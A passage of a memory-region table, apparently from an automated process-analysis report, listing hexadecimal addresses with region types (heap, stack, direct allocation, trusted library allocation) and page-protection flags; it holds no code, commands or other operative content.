direct allocation
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
C0002D6000
|
direct allocation
|
page read and write
|
||
19C742CA000
|
heap
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
19C7488E000
|
heap
|
page read and write
|
||
29745A68000
|
heap
|
page read and write
|
||
1AA49834000
|
heap
|
page read and write
|
||
FDD9DCE000
|
stack
|
page read and write
|
||
2FA087E000
|
stack
|
page read and write
|
||
7B1958E000
|
stack
|
page read and write
|
||
7FF685593000
|
unkown
|
page readonly
|
||
1AA498A9000
|
heap
|
page read and write
|
||
21DE01A0000
|
heap
|
page read and write
|
||
C000214000
|
direct allocation
|
page read and write
|
||
1AA49855000
|
heap
|
page read and write
|
||
1AA49812000
|
heap
|
page read and write
|
||
2974574B000
|
heap
|
page read and write
|
||
2976C7F8000
|
heap
|
page read and write
|
||
25636CB0000
|
trusted library allocation
|
page read and write
|
||
3EA4F7F000
|
stack
|
page read and write
|
||
19C742C5000
|
heap
|
page read and write
|
||
1AA49876000
|
heap
|
page read and write
|
||
C0003B8000
|
direct allocation
|
page read and write
|
||
C00043E000
|
direct allocation
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
14076620000
|
heap
|
page read and write
|
||
7B1987E000
|
stack
|
page read and write
|
||
4F00278000
|
stack
|
page read and write
|
||
21DDFBA2000
|
heap
|
page read and write
|
||
2976C81D000
|
heap
|
page read and write
|
||
21DDFBA4000
|
heap
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
C0000BC000
|
direct allocation
|
page read and write
|
||
C000174000
|
direct allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
1AA49F0E000
|
heap
|
page read and write
|
||
1AA4987B000
|
heap
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
19C742ED000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
21DE1B20000
|
heap
|
page read and write
|
||
2976C811000
|
heap
|
page read and write
|
||
2976C811000
|
heap
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
C000062000
|
direct allocation
|
page read and write
|
||
C0000BE000
|
direct allocation
|
page read and write
|
||
7FF6845A7000
|
unkown
|
page read and write
|
||
21DDFBFB000
|
heap
|
page read and write
|
||
1405C610000
|
heap
|
page readonly
|
||
C000170000
|
direct allocation
|
page read and write
|
||
2991903B000
|
heap
|
page read and write
|
||
29745800000
|
heap
|
page read and write
|
||
25648BB7000
|
trusted library allocation
|
page read and write
|
||
1407672F000
|
heap
|
page read and write
|
||
C000508000
|
direct allocation
|
page read and write
|
||
25648CFD000
|
trusted library allocation
|
page read and write
|
||
21DDFC8D000
|
heap
|
page read and write
|
||
19C742D0000
|
heap
|
page read and write
|
||
7FF6845AB000
|
unkown
|
page read and write
|
||
C00030C000
|
direct allocation
|
page read and write
|
||
C00032A000
|
direct allocation
|
page read and write
|
||
19C747AA000
|
heap
|
page read and write
|
||
C000254000
|
direct allocation
|
page read and write
|
||
19C74788000
|
heap
|
page read and write
|
||
21DDFBC9000
|
heap
|
page read and write
|
||
1AA4B866000
|
heap
|
page read and write
|
||
C0002D0000
|
direct allocation
|
page read and write
|
||
21DDFBD8000
|
heap
|
page read and write
|
||
C0001EC000
|
direct allocation
|
page read and write
|
||
3EA4BF8000
|
stack
|
page read and write
|
||
2991902C000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
7FF684939000
|
unkown
|
page read and write
|
||
C0002B2000
|
direct allocation
|
page read and write
|
||
1405FF98000
|
trusted library allocation
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
2FA037F000
|
stack
|
page read and write
|
||
2976C80D000
|
heap
|
page read and write
|
||
1AA4B852000
|
heap
|
page read and write
|
||
21DDFBAD000
|
heap
|
page read and write
|
||
C000190000
|
direct allocation
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
C000394000
|
direct allocation
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
1AA49874000
|
heap
|
page read and write
|
||
C000336000
|
direct allocation
|
page read and write
|
||
2991900B000
|
heap
|
page read and write
|
||
21DDFB58000
|
heap
|
page read and write
|
||
19C741E0000
|
trusted library allocation
|
page read and write
|
||
21DDFBE5000
|
heap
|
page read and write
|
||
1AA49A6D000
|
heap
|
page read and write
|
||
C00021E000
|
direct allocation
|
page read and write
|
||
1AA4B864000
|
heap
|
page read and write
|
||
2991903A000
|
heap
|
page read and write
|
||
AA28DFE000
|
stack
|
page read and write
|
||
1AA4989B000
|
heap
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
1AA49F19000
|
heap
|
page read and write
|
||
25636A30000
|
heap
|
page read and write
|
||
AA29FFC000
|
stack
|
page read and write
|
||
7DF40DBC0000
|
trusted library allocation
|
page execute and read and write
|
||
25636A69000
|
heap
|
page read and write
|
||
7FF684969000
|
unkown
|
page readonly
|
||
29745A6A000
|
heap
|
page read and write
|
||
2976C809000
|
heap
|
page read and write
|
||
C000274000
|
direct allocation
|
page read and write
|
||
C00001A000
|
direct allocation
|
page read and write
|
||
7B1950E000
|
stack
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
25648A10000
|
trusted library allocation
|
page read and write
|
||
C000340000
|
direct allocation
|
page read and write
|
||
1AA49920000
|
heap
|
page read and write
|
||
19C742DB000
|
heap
|
page read and write
|
||
21DDFB00000
|
heap
|
page read and write
|
||
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
21DE1B34000
|
heap
|
page read and write
|
||
21DDFBBA000
|
heap
|
page read and write
|
||
C000260000
|
direct allocation
|
page read and write
|
||
C0000A0000
|
direct allocation
|
page read and write
|
||
1AA4985D000
|
heap
|
page read and write
|
||
AA29BFF000
|
stack
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
25650D1B000
|
heap
|
page read and write
|
||
2976C795000
|
direct allocation
|
page read and write
|
||
7FF6845D2000
|
unkown
|
page read and write
|
||
C000388000
|
direct allocation
|
page read and write
|
||
21DDFBBA000
|
heap
|
page read and write
|
||
C000012000
|
direct allocation
|
page read and write
|
||
1AA4985D000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
2991903E000
|
heap
|
page read and write
|
||
C000128000
|
direct allocation
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
C00039E000
|
direct allocation
|
page read and write
|
||
21DDFB50000
|
heap
|
page read and write
|
||
21DDFBE8000
|
heap
|
page read and write
|
||
21DDFBBF000
|
heap
|
page read and write
|
||
25648A01000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD09000
|
trusted library allocation
|
page read and write
|
||
29745914000
|
direct allocation
|
page read and write
|
||
C000208000
|
direct allocation
|
page read and write
|
||
19C7488A000
|
heap
|
page read and write
|
||
21DE01C9000
|
heap
|
page read and write
|
||
7FF684933000
|
unkown
|
page read and write
|
||
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
C000153000
|
direct allocation
|
page read and write
|
||
1AA49846000
|
heap
|
page read and write
|
||
21DDFBE8000
|
heap
|
page read and write
|
||
25650AEB000
|
heap
|
page read and write
|
||
C0000EC000
|
direct allocation
|
page read and write
|
||
2976C7E7000
|
heap
|
page read and write
|
||
AA299FE000
|
stack
|
page read and write
|
||
29919250000
|
heap
|
page read and write
|
||
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
AA295FE000
|
stack
|
page read and write
|
||
7FFD9BCE6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
C0002AA000
|
direct allocation
|
page read and write
|
||
C0001CE000
|
direct allocation
|
page read and write
|
||
C000548000
|
direct allocation
|
page read and write
|
||
2563A2EA000
|
trusted library allocation
|
page read and write
|
||
19C742DE000
|
heap
|
page read and write
|
||
1405E542000
|
trusted library allocation
|
page read and write
|
||
1AA49F1C000
|
heap
|
page read and write
|
||
25638A89000
|
trusted library allocation
|
page read and write
|
||
1405C720000
|
heap
|
page execute and read and write
|
||
1AA49EF7000
|
heap
|
page read and write
|
||
C0000FC000
|
direct allocation
|
page read and write
|
||
2FA057E000
|
stack
|
page read and write
|
||
C000033000
|
direct allocation
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
1405E38C000
|
trusted library allocation
|
page read and write
|
||
3EA4FFF000
|
stack
|
page read and write
|
||
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
1AA49F04000
|
heap
|
page read and write
|
||
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
29745910000
|
direct allocation
|
page read and write
|
||
C000064000
|
direct allocation
|
page read and write
|
||
1405C6D3000
|
trusted library allocation
|
page read and write
|
||
21DDFBED000
|
heap
|
page read and write
|
||
1405C755000
|
heap
|
page read and write
|
||
7FF68496B000
|
unkown
|
page write copy
|
||
25636A40000
|
heap
|
page read and write
|
||
19C747A9000
|
heap
|
page read and write
|
||
2974576C000
|
heap
|
page read and write
|
||
C000046000
|
direct allocation
|
page read and write
|
||
C000068000
|
direct allocation
|
page read and write
|
||
1AA49940000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
19C747B9000
|
heap
|
page read and write
|
||
1405FED2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD06000
|
trusted library allocation
|
page read and write
|
||
1AA4999A000
|
heap
|
page read and write
|
||
C000006000
|
direct allocation
|
page read and write
|
||
1AA4999A000
|
heap
|
page read and write
|
||
C000318000
|
direct allocation
|
page read and write
|
||
C000085000
|
direct allocation
|
page read and write
|
||
19C742A9000
|
heap
|
page read and write
|
||
C000168000
|
direct allocation
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
C00005C000
|
direct allocation
|
page read and write
|
||
C00057C000
|
direct allocation
|
page read and write
|
||
1AA49F02000
|
heap
|
page read and write
|
||
1AA49997000
|
heap
|
page read and write
|
||
7B19487000
|
stack
|
page read and write
|
||
2563A346000
|
trusted library allocation
|
page read and write
|
||
C00009C000
|
direct allocation
|
page read and write
|
||
25636ABE000
|
heap
|
page read and write
|
||
25650CE0000
|
heap
|
page execute and read and write
|
||
CFBA6FF000
|
stack
|
page read and write
|
||
1405FD40000
|
trusted library allocation
|
page read and write
|
||
2976C7EF000
|
heap
|
page read and write
|
||
19C742ED000
|
heap
|
page read and write
|
||
1AA498A7000
|
heap
|
page read and write
|
||
C000316000
|
direct allocation
|
page read and write
|
||
19C7617D000
|
heap
|
page read and write
|
||
C000302000
|
direct allocation
|
page read and write
|
||
7FF684967000
|
unkown
|
page read and write
|
||
C00054A000
|
direct allocation
|
page read and write
|
||
C000552000
|
direct allocation
|
page read and write
|
||
C0002A8000
|
direct allocation
|
page read and write
|
||
C00016E000
|
direct allocation
|
page read and write
|
||
19C76172000
|
heap
|
page read and write
|
||
AA291FD000
|
stack
|
page read and write
|
||
19C742D6000
|
heap
|
page read and write
|
||
1AA4B85D000
|
heap
|
page read and write
|
||
25650D18000
|
heap
|
page read and write
|
||
1FAF2888000
|
heap
|
page read and write
|
||
C000320000
|
direct allocation
|
page read and write
|
||
19C74430000
|
heap
|
page read and write
|
||
19C74791000
|
heap
|
page read and write
|
||
C00041C000
|
direct allocation
|
page read and write
|
||
29745A68000
|
heap
|
page read and write
|
||
1AA4999B000
|
heap
|
page read and write
|
||
C000558000
|
direct allocation
|
page read and write
|
||
29918F70000
|
heap
|
page read and write
|
||
2563A033000
|
trusted library allocation
|
page read and write
|
||
19C747AF000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
C000540000
|
direct allocation
|
page read and write
|
||
19C74885000
|
heap
|
page read and write
|
||
1FAF28CD000
|
heap
|
page read and write
|
||
C0001D6000
|
direct allocation
|
page read and write
|
||
C000384000
|
direct allocation
|
page read and write
|
||
19C747A0000
|
heap
|
page read and write
|
||
C000056000
|
direct allocation
|
page read and write
|
||
C00000E000
|
direct allocation
|
page read and write
|
||
19C7488A000
|
heap
|
page read and write
|
||
21DE019B000
|
heap
|
page read and write
|
||
1AA49836000
|
heap
|
page read and write
|
||
21DDFB20000
|
heap
|
page read and write
|
||
21DDFB78000
|
heap
|
page read and write
|
||
1AA49867000
|
heap
|
page read and write
|
||
C00005A000
|
direct allocation
|
page read and write
|
||
1AA4989F000
|
heap
|
page read and write
|
||
1406E60D000
|
trusted library allocation
|
page read and write
|
||
1AA49855000
|
heap
|
page read and write
|
||
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
21DE1B2D000
|
heap
|
page read and write
|
||
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
C0003BE000
|
direct allocation
|
page read and write
|
||
C00042E000
|
direct allocation
|
page read and write
|
||
C00002A000
|
direct allocation
|
page read and write
|
||
2976C803000
|
heap
|
page read and write
|
||
19C76176000
|
heap
|
page read and write
|
||
C000241000
|
direct allocation
|
page read and write
|
||
C000138000
|
direct allocation
|
page read and write
|
||
1FAF2A20000
|
heap
|
page read and write
|
||
1AA49940000
|
trusted library allocation
|
page read and write
|
||
21DDFBAB000
|
heap
|
page read and write
|
||
29918FE0000
|
heap
|
page read and write
|
||
C00024E000
|
direct allocation
|
page read and write
|
||
21DE01CC000
|
heap
|
page read and write
|
||
1FAF28CD000
|
heap
|
page read and write
|
||
1FAF28CD000
|
heap
|
page read and write
|
||
C000022000
|
direct allocation
|
page read and write
|
||
7FF6845D3000
|
unkown
|
page write copy
|
||
C000560000
|
direct allocation
|
page read and write
|
||
19C74887000
|
heap
|
page read and write
|
||
25636CF0000
|
trusted library allocation
|
page read and write
|
||
2976C80D000
|
heap
|
page read and write
|
||
1AA49834000
|
heap
|
page read and write
|
||
C000328000
|
direct allocation
|
page read and write
|
||
25650AC0000
|
heap
|
page read and write
|
||
25650AB0000
|
heap
|
page execute and read and write
|
||
21DE019A000
|
heap
|
page read and write
|
||
C000350000
|
direct allocation
|
page read and write
|
||
25636D00000
|
heap
|
page read and write
|
||
C00000C000
|
direct allocation
|
page read and write
|
||
21DDFBF2000
|
heap
|
page read and write
|
||
21DDFBC4000
|
heap
|
page read and write
|
||
1405F942000
|
trusted library allocation
|
page read and write
|
||
C000332000
|
direct allocation
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
1AA49876000
|
heap
|
page read and write
|
||
21DE0110000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
21DE1B26000
|
heap
|
page read and write
|
||
19C742A5000
|
heap
|
page read and write
|
||
C000286000
|
direct allocation
|
page read and write
|
||
1FAF28A6000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1405C5E0000
|
trusted library allocation
|
page read and write
|
||
AA293FF000
|
stack
|
page read and write
|
||
1AA49900000
|
heap
|
page read and write
|
||
19C74780000
|
heap
|
page read and write
|
||
21DDFBB2000
|
heap
|
page read and write
|
||
2976C7F1000
|
heap
|
page read and write
|
||
21DE0192000
|
heap
|
page read and write
|
||
1405C6D0000
|
trusted library allocation
|
page read and write
|
||
4F0047E000
|
stack
|
page read and write
|
||
2976C811000
|
heap
|
page read and write
|
||
4F0037E000
|
stack
|
page read and write
|
||
C00053C000
|
direct allocation
|
page read and write
|
||
1AA49842000
|
heap
|
page read and write
|
||
29919005000
|
heap
|
page read and write
|
||
C000049000
|
direct allocation
|
page read and write
|
||
25650AF6000
|
heap
|
page read and write
|
||
21DDFB67000
|
heap
|
page read and write
|
||
C00007A000
|
direct allocation
|
page read and write
|
||
1AA49838000
|
heap
|
page read and write
|
||
1405FA0A000
|
trusted library allocation
|
page read and write
|
||
25636A60000
|
heap
|
page read and write
|
||
3EA507F000
|
stack
|
page read and write
|
||
C00000A000
|
direct allocation
|
page read and write
|
||
C0001FE000
|
direct allocation
|
page read and write
|
||
297458E0000
|
heap
|
page read and write
|
||
C00017E000
|
direct allocation
|
page read and write
|
||
21DDFBB1000
|
heap
|
page read and write
|
||
2FA027F000
|
stack
|
page read and write
|
||
7FF6845A7000
|
unkown
|
page write copy
|
||
25648A74000
|
trusted library allocation
|
page read and write
|
||
1405C750000
|
heap
|
page read and write
|
||
297456FB000
|
heap
|
page read and write
|
||
FE5137F000
|
stack
|
page read and write
|
||
19C74210000
|
heap
|
page read and write
|
||
21DE01C9000
|
heap
|
page read and write
|
||
1AA4B85E000
|
heap
|
page read and write
|
||
2976C810000
|
heap
|
page read and write
|
||
21DE019A000
|
heap
|
page read and write
|
||
C000284000
|
direct allocation
|
page read and write
|
||
1AA49840000
|
heap
|
page read and write
|
||
21DDFC80000
|
heap
|
page read and write
|
||
25650B13000
|
heap
|
page read and write
|
||
2563A2BF000
|
trusted library allocation
|
page read and write
|
||
C000044000
|
direct allocation
|
page read and write
|
||
C00016C000
|
direct allocation
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
21DDFBF3000
|
heap
|
page read and write
|
||
2FA05F9000
|
stack
|
page read and write
|
||
C000098000
|
direct allocation
|
page read and write
|
||
14076500000
|
heap
|
page read and write
|
||
19C7478F000
|
heap
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1AA4986A000
|
heap
|
page read and write
|
||
AA29DFF000
|
stack
|
page read and write
|
||
1405C460000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
FDDB0CF000
|
stack
|
page read and write
|
||
C0002CA000
|
direct allocation
|
page read and write
|
||
C000382000
|
direct allocation
|
page read and write
|
||
C000134000
|
direct allocation
|
page read and write
|
||
21DDFBEC000
|
heap
|
page read and write
|
||
C00054E000
|
direct allocation
|
page read and write
|
||
19C742CF000
|
heap
|
page read and write
|
||
C0001E8000
|
direct allocation
|
page read and write
|
||
C00042B000
|
direct allocation
|
page read and write
|
||
1AA4B85E000
|
heap
|
page read and write
|
||
C0001DE000
|
direct allocation
|
page read and write
|
||
C000051000
|
direct allocation
|
page read and write
|
||
25636B48000
|
heap
|
page read and write
|
||
256386B0000
|
heap
|
page read and write
|
||
C000160000
|
direct allocation
|
page read and write
|
||
25636AE5000
|
heap
|
page read and write
|
||
C000076000
|
direct allocation
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
19C742A6000
|
heap
|
page read and write
|
||
21DE1B24000
|
heap
|
page read and write
|
||
29918F40000
|
heap
|
page read and write
|
||
21DDFBA2000
|
heap
|
page read and write
|
||
FE512FE000
|
stack
|
page read and write
|
||
29745A60000
|
heap
|
page read and write
|
||
19C747B0000
|
heap
|
page read and write
|
||
7FF685597000
|
unkown
|
page readonly
|
||
19C74887000
|
heap
|
page read and write
|
||
C000278000
|
direct allocation
|
page read and write
|
||
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
1406E4C7000
|
trusted library allocation
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
21DDFBC8000
|
heap
|
page read and write
|
||
2976AC79000
|
direct allocation
|
page read and write
|
||
C000096000
|
direct allocation
|
page read and write
|
||
C000444000
|
direct allocation
|
page read and write
|
||
1405C440000
|
heap
|
page read and write
|
||
C000264000
|
direct allocation
|
page read and write
|
||
19C741C0000
|
heap
|
page read and write
|
||
14076560000
|
heap
|
page read and write
|
||
1AA4B851000
|
heap
|
page read and write
|
||
1AA4B854000
|
heap
|
page read and write
|
||
1AA4985B000
|
heap
|
page read and write
|
||
1AA49860000
|
heap
|
page read and write
|
||
1AA4B840000
|
heap
|
page read and write
|
||
19C74270000
|
heap
|
page read and write
|
||
C000562000
|
direct allocation
|
page read and write
|
||
C000322000
|
direct allocation
|
page read and write
|
||
1AA49840000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB52000
|
trusted library allocation
|
page read and write
|
||
1FAF2880000
|
heap
|
page read and write
|
||
19C742C6000
|
heap
|
page read and write
|
||
1AA49A65000
|
heap
|
page read and write
|
||
7FF6845EC000
|
unkown
|
page readonly
|
||
C000120000
|
direct allocation
|
page read and write
|
||
1AA4989B000
|
heap
|
page read and write
|
||
1AA49F0E000
|
heap
|
page read and write
|
||
1AA49834000
|
heap
|
page read and write
|
||
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
2976AC70000
|
direct allocation
|
page read and write
|
||
2F9FF92000
|
stack
|
page read and write
|
||
1AA49A60000
|
heap
|
page read and write
|
||
21DE0193000
|
heap
|
page read and write
|
||
2563A0FE000
|
trusted library allocation
|
page read and write
|
||
C000180000
|
direct allocation
|
page read and write
|
||
29745970000
|
direct allocation
|
page read and write
|
||
1AA4985D000
|
heap
|
page read and write
|
||
C000245000
|
direct allocation
|
page read and write
|
||
2976C80E000
|
heap
|
page read and write
|
||
1AA4999E000
|
heap
|
page read and write
|
||
21DE01D3000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
C0001C6000
|
direct allocation
|
page read and write
|
||
1AA4989D000
|
heap
|
page read and write
|
||
14076737000
|
heap
|
page read and write
|
||
2976C79B000
|
direct allocation
|
page read and write
|
||
25638503000
|
trusted library allocation
|
page read and write
|
||
C00011A000
|
direct allocation
|
page read and write
|
||
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
2991902C000
|
heap
|
page read and write
|
||
21DE0197000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
FE50EFB000
|
stack
|
page read and write
|
||
21DDFBE8000
|
heap
|
page read and write
|
||
C000144000
|
direct allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
2976C7A0000
|
direct allocation
|
page read and write
|
||
19C742C4000
|
heap
|
page read and write
|
||
25636AAE000
|
heap
|
page read and write
|
||
19C74435000
|
heap
|
page read and write
|
||
C00018C000
|
direct allocation
|
page read and write
|
||
1AA4986F000
|
heap
|
page read and write
|
||
21DE1B2D000
|
heap
|
page read and write
|
||
7FF6845D4000
|
unkown
|
page read and write
|
||
25638A01000
|
trusted library allocation
|
page read and write
|
||
C000272000
|
direct allocation
|
page read and write
|
||
2FA0779000
|
stack
|
page read and write
|
||
1AA4B850000
|
heap
|
page read and write
|
||
1405C4A0000
|
heap
|
page read and write
|
||
C000280000
|
direct allocation
|
page read and write
|
||
C00012A000
|
direct allocation
|
page read and write
|
||
21DE01D2000
|
heap
|
page read and write
|
||
19C742D9000
|
heap
|
page read and write
|
||
C00022A000
|
direct allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
C000247000
|
direct allocation
|
page read and write
|
||
140765FD000
|
heap
|
page read and write
|
||
29745918000
|
direct allocation
|
page read and write
|
||
2FA04FE000
|
stack
|
page read and write
|
||
19C7488B000
|
heap
|
page read and write
|
||
2FA03FD000
|
stack
|
page read and write
|
||
14076727000
|
heap
|
page read and write
|
||
1AA49EF0000
|
heap
|
page read and write
|
||
7B1997E000
|
stack
|
page read and write
|
||
19C74880000
|
heap
|
page read and write
|
||
21DE01AC000
|
heap
|
page read and write
|
||
1AA4987A000
|
heap
|
page read and write
|
||
C0000FA000
|
direct allocation
|
page read and write
|
||
25636AA6000
|
heap
|
page read and write
|
||
21DDFB87000
|
heap
|
page read and write
|
||
21DDFBA2000
|
heap
|
page read and write
|
||
C000155000
|
direct allocation
|
page read and write
|
||
1AA49898000
|
heap
|
page read and write
|
||
C0003D4000
|
direct allocation
|
page read and write
|
||
25650B6D000
|
heap
|
page read and write
|
||
1AA4999A000
|
heap
|
page read and write
|
||
25651000000
|
heap
|
page read and write
|
||
C000239000
|
direct allocation
|
page read and write
|
||
7FF68496E000
|
unkown
|
page readonly
|
||
C0000F6000
|
direct allocation
|
page read and write
|
||
19C742C1000
|
heap
|
page read and write
|
||
1AA49855000
|
heap
|
page read and write
|
||
25650B15000
|
heap
|
page read and write
|
||
1AA49851000
|
heap
|
page read and write
|
||
21DE019E000
|
heap
|
page read and write
|
||
1AA49997000
|
heap
|
page read and write
|
||
1AA49840000
|
heap
|
page read and write
|
||
21DE01A7000
|
heap
|
page read and write
|
||
C000420000
|
direct allocation
|
page read and write
|
||
1AA4B864000
|
heap
|
page read and write
|
||
21DDFB40000
|
trusted library allocation
|
page read and write
|
||
21DDFBA5000
|
heap
|
page read and write
|
||
1405C52A000
|
heap
|
page read and write
|
||
21DDFBF3000
|
heap
|
page read and write
|
||
C00010E000
|
direct allocation
|
page read and write
|
||
C000192000
|
direct allocation
|
page read and write
|
||
2976C811000
|
heap
|
page read and write
|
||
C000427000
|
direct allocation
|
page read and write
|
||
19C76184000
|
heap
|
page read and write
|
||
21DE1B2D000
|
heap
|
page read and write
|
||
2976C835000
|
heap
|
page read and write
|
||
1AA49994000
|
heap
|
page read and write
|
||
CFBA67E000
|
stack
|
page read and write
|
||
C00033C000
|
direct allocation
|
page read and write
|
||
19C74793000
|
heap
|
page read and write
|
||
AA297FC000
|
stack
|
page read and write
|
||
1AA4999E000
|
heap
|
page read and write
|
||
FE50FFF000
|
stack
|
page read and write
|
||
25650AED000
|
heap
|
page read and write
|
||
1405C4E9000
|
heap
|
page read and write
|
||
2976C7F9000
|
heap
|
page read and write
|
||
19C7443B000
|
heap
|
page read and write
|
||
21DDFB67000
|
heap
|
page read and write
|
||
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
C000041000
|
direct allocation
|
page read and write
|
||
1AA49853000
|
heap
|
page read and write
|
||
2976C80F000
|
heap
|
page read and write
|
||
1AA49993000
|
heap
|
page read and write
|
||
21DDFBC4000
|
heap
|
page read and write
|
||
21DDFBBA000
|
heap
|
page read and write
|
||
C000018000
|
direct allocation
|
page read and write
|
||
2976C7FB000
|
heap
|
page read and write
|
||
25650D50000
|
heap
|
page read and write
|
||
2991902C000
|
heap
|
page read and write
|
||
19C7617D000
|
heap
|
page read and write
|
||
1AA4988A000
|
heap
|
page read and write
|
||
21DE019E000
|
heap
|
page read and write
|
||
7FF6841C0000
|
unkown
|
page readonly
|
||
2974574D000
|
heap
|
page read and write
|
||
25650B8F000
|
heap
|
page read and write
|
||
C000324000
|
direct allocation
|
page read and write
|
||
2976C80B000
|
heap
|
page read and write
|
||
2976C810000
|
heap
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
2976C7E3000
|
heap
|
page read and write
|
||
C00001E000
|
direct allocation
|
page read and write
|
||
7FFD9B9CB000
|
trusted library allocation
|
page read and write
|
||
1405FF9C000
|
trusted library allocation
|
page read and write
|
||
C00051A000
|
direct allocation
|
page read and write
|
||
1405C51D000
|
heap
|
page read and write
|
||
C00046A000
|
direct allocation
|
page read and write
|
||
21DE01D5000
|
heap
|
page read and write
|
||
C000429000
|
direct allocation
|
page read and write
|
||
C00014C000
|
direct allocation
|
page read and write
|
||
1AA49853000
|
heap
|
page read and write
|
||
19C747B9000
|
heap
|
page read and write
|
||
C00005E000
|
direct allocation
|
page read and write
|
||
C000400000
|
direct allocation
|
page read and write
|
||
21DDFBB2000
|
heap
|
page read and write
|
||
C000364000
|
direct allocation
|
page read and write
|
||
1AA49EFF000
|
heap
|
page read and write
|
||
C000066000
|
direct allocation
|
page read and write
|
||
2976C7E7000
|
heap
|
page read and write
|
||
21DE0194000
|
heap
|
page read and write
|
||
19C742C1000
|
heap
|
page read and write
|
||
1AA4985B000
|
heap
|
page read and write
|
||
19C742E1000
|
heap
|
page read and write
|
||
1AA4985D000
|
heap
|
page read and write
|
||
19C741E0000
|
trusted library allocation
|
page read and write
|
||
C000250000
|
direct allocation
|
page read and write
|
||
21DE01C9000
|
heap
|
page read and write
|
||
21DDFBC4000
|
heap
|
page read and write
|
||
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
C000008000
|
direct allocation
|
page read and write
|
||
1AA49F29000
|
heap
|
page read and write
|
||
19C742C1000
|
heap
|
page read and write
|
||
3EA4EFF000
|
stack
|
page read and write
|
||
C00004F000
|
direct allocation
|
page read and write
|
||
21DDFB40000
|
trusted library allocation
|
page read and write
|
||
1AA49862000
|
heap
|
page read and write
|
||
C0002BB000
|
direct allocation
|
page read and write
|
||
C0002A4000
|
direct allocation
|
page read and write
|
||
21DDFC8E000
|
heap
|
page read and write
|
||
19C74282000
|
heap
|
page read and write
|
||
1AA49A6E000
|
heap
|
page read and write
|
||
21DDFC90000
|
trusted library allocation
|
page read and write
|
||
1AA49F05000
|
heap
|
page read and write
|
||
2976C810000
|
heap
|
page read and write
|
||
1AA49862000
|
heap
|
page read and write
|
||
21DE01CA000
|
heap
|
page read and write
|
||
2976C7F1000
|
heap
|
page read and write
|
||
C00017C000
|
direct allocation
|
page read and write
|
||
19C741A0000
|
heap
|
page read and write
|
||
2976C7E3000
|
heap
|
page read and write
|
||
21DDFBAD000
|
heap
|
page read and write
|
||
21DDFB62000
|
heap
|
page read and write
|
||
C0001B6000
|
direct allocation
|
page read and write
|
||
2FA047F000
|
stack
|
page read and write
|
||
C0002F2000
|
direct allocation
|
page read and write
|
||
21DDFBAB000
|
heap
|
page read and write
|
||
21DDFBBD000
|
heap
|
page read and write
|
||
1405E311000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
